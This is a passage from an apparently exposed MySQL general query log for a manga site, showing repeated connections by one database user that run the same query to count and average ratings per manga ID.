as average_rating FROM ratings where manga_id = '129' order by created desc 330639450 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639449 Quit 330639450 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '155' order by created desc 330639450 Quit 330639451 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639452 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639451 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330639451 Quit 330639452 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330639452 Quit 330639453 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639453 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330639453 Quit 330639455 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639454 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639455 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330639454 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330639455 Quit 330639454 Quit 330639456 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639457 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639456 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330639457 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330639456 Quit 330639457 Quit 330639458 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639459 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639458 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330639459 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '167' order by created desc 330639458 Quit 330639459 Quit 330639460 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639460 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330639461 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639460 Quit 330639461 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '145' order by created desc 330639461 Quit 330639462 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639463 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639462 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330639463 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '69' order by created desc 330639462 Quit 330639463 Quit 330639464 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639465 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639464 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330639465 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '144' order by created desc 330639464 Quit 330639465 Quit 330639466 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639466 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330639467 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639466 Quit 330639467 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '165' order by created desc 330639467 Quit 330639468 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639468 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330639469 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639468 Quit 330639469 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '148' order by created desc 330639469 Quit 330639470 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639471 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639470 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330639471 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '154' order by created desc 330639470 Quit 330639471 Quit 330639472 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639472 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330639473 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639472 Quit 330639473 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330639473 Quit 330639474 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639475 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639474 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330639474 Quit 330639475 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330639475 Quit 330639476 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639477 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639477 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330639476 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330639477 Quit 330639478 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639478 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330639478 Quit 330639476 Quit 330639479 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639479 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330639480 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639479 Quit 330639480 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330639480 Quit 330639481 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639481 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330639482 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639481 Quit 330639482 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330639482 Quit 330639483 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639484 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639483 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330639483 Quit 330639484 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '56' order by created desc 330639484 Quit 330639485 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639486 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639485 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330639486 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330639485 Quit 330639486 Quit 330639487 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639487 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330639487 Quit 330639488 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639489 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639488 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330639489 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330639489 Quit 330639488 Quit 330639490 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639491 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639490 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330639490 Quit 330639491 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330639491 Quit 330639492 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639492 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330639493 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639492 Quit 330639493 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330639493 Quit 330639494 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639494 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330639494 Quit 330639495 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639495 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330639496 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639495 Quit 330639496 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330639496 Quit 330639497 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639497 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330639498 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639498 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '164' order by created desc 330639497 Quit 330639498 Quit 330639499 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639499 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330639500 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639499 Quit 330639500 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330639501 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639500 Quit 330639501 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330639501 Quit 330639502 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639502 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330639503 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639502 Quit 330639503 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330639503 Quit 330639504 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639505 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639505 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330639504 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330639504 Quit 330639505 Quit 330639506 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639507 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639506 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330639507 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330639506 Quit 330639507 Quit 330639508 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639509 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639508 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330639509 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '79' order by created desc 330639508 Quit 330639509 Quit 330639510 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639511 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639510 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330639511 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330639510 Quit 330639511 Quit 330639512 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639513 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639512 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330639513 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330639512 Quit 330639513 Quit 330639514 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639514 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330639515 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639514 Quit 330639515 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330639516 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639515 Quit 330639516 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330639516 Quit 330639517 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639518 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639517 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '134' order by created desc 330639518 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330639517 Quit 330639518 Quit 330639519 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639520 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639519 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330639520 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330639519 Quit 330639520 Quit 330639522 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639521 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639521 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330639522 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330639521 Quit 330639138 Quit 330639522 Quit 330639523 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639523 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '162' order by created desc 330639524 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639523 Quit 330639524 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330639524 Quit 330639525 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639525 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330639525 Quit 330639526 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639526 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330639527 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639526 Quit 330639527 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330639528 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639527 Quit 330639528 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330639528 Quit 330639529 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639530 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639529 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330639530 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330639529 Quit 330639530 Quit 330639531 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639531 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330639531 Quit 330639532 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639532 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330639532 Quit 330639533 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639533 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '139' order by created desc 330639533 Quit 330639534 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639534 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330639535 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639535 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330639535 Quit 330639536 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639537 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639536 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330639537 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '161' order by created desc 330639536 Quit 330639537 Quit 330639538 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639539 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639538 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330639539 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330639538 Quit 330639539 Quit 330639540 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639540 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330639541 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639534 Quit 330639540 Quit 330639541 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330639541 Quit 330639542 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639542 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330639543 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639542 Quit 330639543 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330639543 Quit 330639545 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639544 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639545 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330639545 Quit 330639544 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330639544 Quit 330639547 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639546 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639547 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330639546 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330639547 Quit 330639546 Quit 330639548 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639549 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639548 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330639549 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330639548 Quit 330639549 Quit 330639550 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639550 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330639550 Quit 330639551 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639551 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330639551 Quit 330639552 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639552 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330639553 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639553 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330639552 Quit 330639553 Quit 330639554 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639554 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330639555 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639555 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330639554 Quit 330639555 Quit 330639556 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639556 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330639557 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639556 Quit 330639557 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330639558 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639557 Quit 330639558 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330639558 Quit 330639560 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639559 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639560 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330639559 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '171' order by created desc 330639560 Quit 330639559 Quit 330639561 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639561 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330639562 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639562 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330639561 Quit 330639562 Quit 330639563 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639564 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639564 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330639564 Quit 330639563 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330639565 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639565 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330639563 Quit 330639565 Quit 330639567 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639566 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639566 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330639567 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330639566 Quit 330639567 Quit 330639568 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639568 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330639569 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639568 Quit 330639569 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '156' order by created desc 330639569 Quit 330639570 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639571 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639570 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330639571 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330639570 Quit 330639571 Quit 330639572 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639572 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330639572 Quit 330639573 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639573 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330639574 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639574 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330639573 Quit 330639575 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639574 Quit 330639575 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '168' order by created desc 330639575 Quit 330639577 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639576 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639577 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '147' order by created desc 330639577 Quit 330639576 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330639576 Quit 330639578 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639579 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639578 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330639578 Quit 330639579 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330639579 Quit 330639580 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639581 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639580 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330639581 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330639580 Quit 330639581 Quit 330639583 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639582 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639583 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330639582 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330639583 Quit 330639582 Quit 330639584 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639584 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330639584 Quit 330639585 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639585 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330639586 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639585 Quit 330639586 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330639586 Quit 330639588 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639588 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330639587 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639588 Quit 330639587 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330639589 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639589 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330639587 Quit 330639589 Quit 330639591 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639590 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639591 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330639590 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330639591 Quit 330639590 Quit 330639592 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639593 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639592 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330639593 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330639592 Quit 330639593 Quit 330639594 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639595 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639594 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330639595 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330639594 Quit 330639595 Quit 330639596 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639596 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330639596 Quit 330639597 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639597 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330639598 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639598 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330639597 Quit 330639598 Quit 330639599 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639600 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639599 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330639600 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330639599 Quit 330639600 Quit 330639601 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330639602 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330639601 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330639602 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating 